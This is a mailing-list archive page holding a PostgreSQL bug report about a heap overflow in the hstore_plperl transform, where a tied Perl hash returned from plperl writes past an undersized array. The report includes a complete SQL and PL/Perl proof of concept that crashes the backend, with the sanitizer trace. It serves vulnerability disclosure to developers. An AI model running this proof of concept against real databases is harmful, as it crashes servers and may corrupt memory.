agora inbox for pgsql-bugs@postgresql.org  
help / color / mirror / Atom feed
From: PG Bug reporting form <noreply@postgresql.org>
To: pgsql-bugs@lists.postgresql.org
Cc: 1217816127@qq.com
Subject: BUG #19604: Bug 9: `plperl_to_hstore` heap overflow with a tied Perl hash
Date: Mon, 03 Aug 2026 08:22:20 +0000
Message-ID: <19604-2471ca9f781fa9e0@postgresql.org> (raw)

The following bug has been logged on the website:

Bug reference:      19604
Logged by:          Yuelin Wang
Email address:      1217816127@qq.com
PostgreSQL version: 19beta2
Operating system:   Linux (Ubuntu 24.04, x86_64)
Description:        

### Summary

In `contrib/hstore_plperl/hstore_plperl.c`, `plperl_to_hstore()` sizes its
`Pairs` array from `hv_iterinit()`. For tied Perl hashes, that count can be
small while `hv_iternext()` yields many keys. Trusted `plperl` code can
return such a hash and write far past the allocated array during hstore
conversion.

### PoC

SQL script:

```sql
CREATE EXTENSION IF NOT EXISTS hstore;
CREATE EXTENSION IF NOT EXISTS plperl;
CREATE EXTENSION IF NOT EXISTS hstore_plperl;

CREATE OR REPLACE FUNCTION vuln_hstore_boom() RETURNS hstore
LANGUAGE plperl
TRANSFORM FOR TYPE hstore
AS $$
  package VulnEvil;
  sub TIEHASH { bless { n=>0, max=>100000 }, shift }
  sub FIRSTKEY { $_[0]{n}=0; "k0" }
  sub NEXTKEY  { my $s=shift; $s->{n}++; $s->{n}>=$s->{max} ? undef :
"k".$s->{n} }
  sub FETCH { "v" }
  sub EXISTS { 1 }
  package main;
  tie my %h, 'VulnEvil';
  return \%h;
$$;

SELECT vuln_hstore_boom();
```

### Result

The backend crashes during hstore conversion:

```text
AddressSanitizer: SEGV
plperl_to_hstore
plperl_sv_to_datum
plperl_func_handler
server closed the connection unexpectedly
```








view thread (2+ messages)  latest in thread

Message-ID: <19604-2471ca9f781fa9e0@postgresql.org>
Permalink:  ../19604-2471ca9f781fa9e0@postgresql.org/
Also on:    postgresql.org/message-id/19604-2471ca9f781fa9e0@postgresql.org

reply

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Reply to all the recipients using the --to and --cc options:
  reply via email

  To: pgsql-bugs@postgresql.org
  Cc: noreply@postgresql.org, pgsql-bugs@lists.postgresql.org, 1217816127@qq.com
  Subject: Re: BUG #19604: Bug 9: `plperl_to_hstore` heap overflow with a tied Perl hash
  In-Reply-To: <19604-2471ca9f781fa9e0@postgresql.org>

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

This inbox is served by agora; see mirroring instructions
for how to clone and mirror all data and code used for this inbox